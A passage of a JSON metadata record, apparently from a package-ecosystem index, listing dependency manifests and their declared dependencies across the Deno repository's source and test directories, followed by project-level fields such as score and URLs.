ave_code/deno.json","dependencies":[{"id":25970009229,"package_name":"chalk","ecosystem":"deno","requirements":"^5.4.1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"deno","filepath":"tests/specs/npm/trust_signals/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:29:37.117Z","updated_at":"2026-08-08T17:29:37.117Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/npm/trust_signals/deno.json","dependencies":[]},{"ecosystem":"cargo","filepath":"libs/cache_dir/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:25.627Z","updated_at":"2026-08-08T17:28:25.627Z","repository_link":"https://github.com/denoland/deno/blob/main/libs/cache_dir/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"libs/npm/fuzz/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:27.631Z","updated_at":"2026-08-08T17:28:27.631Z","repository_link":"https://github.com/denoland/deno/blob/main/libs/npm/fuzz/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"libs/npm_installer/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:27.761Z","updated_at":"2026-08-08T17:28:27.761Z","repository_link":"https://github.com/denoland/deno/blob/main/libs/npm_installer/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"runtime/features/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:29.702Z","updated_at":"2026-08-08T17:28:29.702Z","repository_link":"https://github.com/denoland/deno/blob/main/runtime/features/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"runtime/permissions/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:29.773Z","updated_at":"2026-08-08T17:28:29.773Z","repository_link":"https://github.com/denoland/deno/blob/main/runtime/permissions/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"tests/node_compat/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:30.518Z","updated_at":"2026-08-08T17:28:30.518Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/node_compat/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"tests/unit_node/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:31.378Z","updated_at":"2026-08-08T17:28:31.378Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/unit_node/Cargo.toml","dependencies":[]},{"ecosystem":"cargo","filepath":"tests/util/lib/Cargo.toml","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:31.444Z","updated_at":"2026-08-08T17:28:31.444Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/util/lib/Cargo.toml","dependencies":[]},{"ecosystem":"cpan","filepath":"tests/registry/jsr/@denotest/subtract/meta.json","sha":null,"kind":"lockfile","created_at":"2026-08-08T17:28:34.634Z","updated_at":"2026-08-08T17:28:34.634Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/jsr/@denotest/subtract/meta.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/add/add_with_subpath/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:37.728Z","updated_at":"2026-08-08T17:28:37.728Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/add/add_with_subpath/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/add/package_json_flag/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:39.568Z","updated_at":"2026-08-08T17:28:39.568Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/add/package_json_flag/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/bench/config_permissions/basic/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:40.915Z","updated_at":"2026-08-08T17:28:40.915Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/bench/config_permissions/basic/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/bump_version/workspace_manual_version/a/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:42.981Z","updated_at":"2026-08-08T17:28:42.981Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/bump_version/workspace_manual_version/a/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/bundle/jsx/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:44.229Z","updated_at":"2026-08-08T17:28:44.229Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/bundle/jsx/deno.json","dependencies":[{"id":25970004426,"package_name":"react","ecosystem":"deno","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"deno","filepath":"tests/specs/check/check_jsximportsource_importmap_config/jsximportsource_importmap_config/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:47.106Z","updated_at":"2026-08-08T17:28:47.106Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/check_jsximportsource_importmap_config/jsximportsource_importmap_config/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/check/compiler_options_types/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:50.592Z","updated_at":"2026-08-08T17:28:50.592Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/compiler_options_types/deno.json","dependencies":[{"id":25970004428,"package_name":"@denotest/augments-global","ecosystem":"deno","requirements":"1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"deno","filepath":"tests/specs/check/isolated_declarations/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:52.206Z","updated_at":"2026-08-08T17:28:52.206Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/isolated_declarations/deno.json","dependencies":[]},{"ecosystem":"deno","filepath":"tests/specs/check/tsconfig_files_for_globals/deno.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:28:55.997Z","updated_at":"2026-08-08T17:28:55.997Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/tsconfig_files_for_globals/deno.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/registry/npm/@denotest/no-types-in-conditional-exports/1.0.0/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:16.379Z","updated_at":"2026-08-08T17:33:16.379Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/npm/@denotest/no-types-in-conditional-exports/1.0.0/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/registry/npm/@denotest/node-addon/1.0.0/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:16.531Z","updated_at":"2026-08-08T17:33:16.531Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/npm/@denotest/node-addon/1.0.0/package.json","dependencies":[{"id":25970017426,"package_name":"node-gyp","ecosystem":"npm","requirements":"10.1.0","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"tests/registry/npm/@denotest/require-non-existent/1.0.0/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:26.807Z","updated_at":"2026-08-08T17:33:26.807Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/npm/@denotest/require-non-existent/1.0.0/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/registry/npm/@denotest/scripts-with-publish-date/1.0.0/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:29.043Z","updated_at":"2026-08-08T17:33:29.043Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/npm/@denotest/scripts-with-publish-date/1.0.0/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/registry/npm/@denotest/special-chars-in-bin-name/1.0.0/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:30.322Z","updated_at":"2026-08-08T17:33:30.322Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/npm/@denotest/special-chars-in-bin-name/1.0.0/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/registry/npm/@denotest/wasm-esm/1.0.0/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:35.376Z","updated_at":"2026-08-08T17:33:35.376Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/npm/@denotest/wasm-esm/1.0.0/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/registry/npm/@denotest/with-vuln1/1.1.0/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:35.793Z","updated_at":"2026-08-08T17:33:35.793Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/npm/@denotest/with-vuln1/1.1.0/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/registry/npm/@denotest/with-vuln3/1.0.0/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:37.058Z","updated_at":"2026-08-08T17:33:37.058Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/npm/@denotest/with-vuln3/1.0.0/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/registry/npm/@types/denotest__index-export-no-types/1.0.0/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:38.355Z","updated_at":"2026-08-08T17:33:38.355Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/registry/npm/@types/denotest__index-export-no-types/1.0.0/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/specs/audit/fix/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:40.403Z","updated_at":"2026-08-08T17:33:40.403Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/audit/fix/package.json","dependencies":[{"id":25970018293,"package_name":"@denotest/using-vuln","ecosystem":"npm","requirements":"1.0.0","direct":true,"kind":"runtime","optional":false},{"id":25970018294,"package_name":"@denotest/with-vuln1","ecosystem":"npm","requirements":"1.0.0","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"tests/specs/audit/subpath_registry/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:41.114Z","updated_at":"2026-08-08T17:33:41.114Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/audit/subpath_registry/package.json","dependencies":[{"id":25970018303,"package_name":"@denotest/using-vuln","ecosystem":"npm","requirements":"1.0.0","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"tests/specs/check/jsx_automatic_no_explicit_import_source/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:43.155Z","updated_at":"2026-08-08T17:33:43.155Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/check/jsx_automatic_no_explicit_import_source/package.json","dependencies":[{"id":25970018306,"package_name":"@types/react","ecosystem":"npm","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":25970018307,"package_name":"react","ecosystem":"npm","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"tests/specs/eval/pkg_json_type_cjs/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:49.886Z","updated_at":"2026-08-08T17:33:49.886Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/eval/pkg_json_type_cjs/package.json","dependencies":[]},{"ecosystem":"npm","filepath":"tests/specs/info/byonm/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:50.018Z","updated_at":"2026-08-08T17:33:50.018Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/info/byonm/package.json","dependencies":[{"id":25970018339,"package_name":"@denotest/add","ecosystem":"npm","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"tests/specs/install/catalog_named/packages/a/package.json","sha":null,"kind":"manifest","created_at":"2026-08-08T17:33:51.002Z","updated_at":"2026-08-08T17:33:51.002Z","repository_link":"https://github.com/denoland/deno/blob/main/tests/specs/install/catalog_named/packages/a/package.json","dependencies":[{"id":25970018345,"package_name":"@denotest/esm-basic","ecosystem":"npm","requirements":"catalog:my-deps","direct":true,"kind":"runtime","optional":false}]}],"score":38.18200956332255,"created_at":"2026-09-07T22:52:51.328Z","updated_at":"2026-09-08T23:30:19.535Z","avatar_url":"https://github.com/denoland.png","language":"Rust","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/378950","html_url":"https://summary.ecosyste.ms/projects/378950"}